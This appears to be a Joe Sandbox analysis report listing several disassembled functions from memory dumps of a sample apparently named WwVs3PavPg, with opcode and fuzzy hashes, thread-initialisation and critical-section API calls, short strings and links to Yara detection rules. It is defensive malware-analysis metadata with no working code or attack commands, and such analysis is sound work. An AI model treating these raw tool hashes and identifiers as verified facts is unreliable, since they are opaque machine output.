Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
Instruction ID: c6b6ce85a24c3fb136392ac9d6bd6c39d7965e59de907ef64728266f1d67071b
Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
Instruction Fuzzy Hash: D3214870B00245CBEB20DF38E849BA977A0EFD5308F9442A9D8141B261EBB57586D7CE

Function 04B47F27 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F

__Init_thread_footer.LIBCMT ref: 04B47F95

Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA

Strings

_DC[, xrefs: 04B47F3E
CD^O, xrefs: 04B47F47

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: CD^O$_DC[
API String ID: 4132704954-3597986494
Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
Instruction ID: 6d54276575cec01648bb8cdcd8c95df3e6207059145abe7d593a67d09d2ef70c
Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
Instruction Fuzzy Hash: F30126B0B002049BC720EF79BD0099973B4EBC4304F9401B9D12857250DB74B4419BD9

Function 04B47967 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F

__Init_thread_footer.LIBCMT ref: 04B479D5

Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA

Strings

_DC[, xrefs: 04B4797E
CD^O, xrefs: 04B47987

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: CD^O$_DC[
API String ID: 4132704954-3597986494
Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
Instruction ID: afbe0b1e3a5232ec8fc45a5e0e38780b7958d014a02b47b1471e8b13860023b7
Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
Instruction Fuzzy Hash: AA0149B0B00208DBCB20FFB8BD40A5D73B0EB44314F8082EAD11957290DB747441DBC9

Function 04B47427 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F

__Init_thread_footer.LIBCMT ref: 04B47490

Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA

Strings

^]E*, xrefs: 04B47444
DCDO, xrefs: 04B4743D

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: DCDO$^]E*
API String ID: 4132704954-2708296792
Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
Instruction ID: 6f4b96e39770c75f6dbf9a5ad1d2e765e7569c03ea8a6f485ed5ebe238ee9a96
Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
Instruction Fuzzy Hash: 2A01ADB0B00208ABCB20EF68E98256DBBB0EB44314F8401BAC91957390CB35B9109F89

Function 04B47317 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F

__Init_thread_footer.LIBCMT ref: 04B47380

Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA

Strings

EDO*, xrefs: 04B47334
DCDO, xrefs: 04B4732D

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: DCDO$EDO*
API String ID: 4132704954-3480089779
Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
Instruction ID: f8e536f69ee61ca72cfba216928ad109341b111eb874ba451fd152c23f1c1cb4
Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
Instruction Fuzzy Hash: 0F01D6F0B013089FDB10DF64E98159DB7B0EB85304F9041F9CA15573A0CB347981DB89

Function 04CE64B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 04CE6519

Strings

DCDO, xrefs: 04CE64C6
EDO*, xrefs: 04CE64CD

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID: Init_thread_footer
String ID: DCDO$EDO*
API String ID: 1385522511-3480089779
Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
Instruction ID: 9a4274da65ab94f9fbd0f34c1431bece6a73b280ecacf18095417aab1c032893
Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
Instruction Fuzzy Hash: 8D01D6B0B023089FD720EFA5E88156CB7B1E704304FD04579CE0597350DB347A818B99

Function 04CE65C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 04CE6629

Strings

^]E*, xrefs: 04CE65DD
DCDO, xrefs: 04CE65D6

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID: Init_thread_footer
String ID: DCDO$^]E*
API String ID: 1385522511-2708296792
Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
Instruction ID: 6848e15de3996628be23f43624e09a179a0b14696eba4def435a4b9af94f50d0
Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
Instruction Fuzzy Hash: AE01AD70B00208EFD720EF68E94256CBBB1EB04304F84417AC90997394DF357A118B99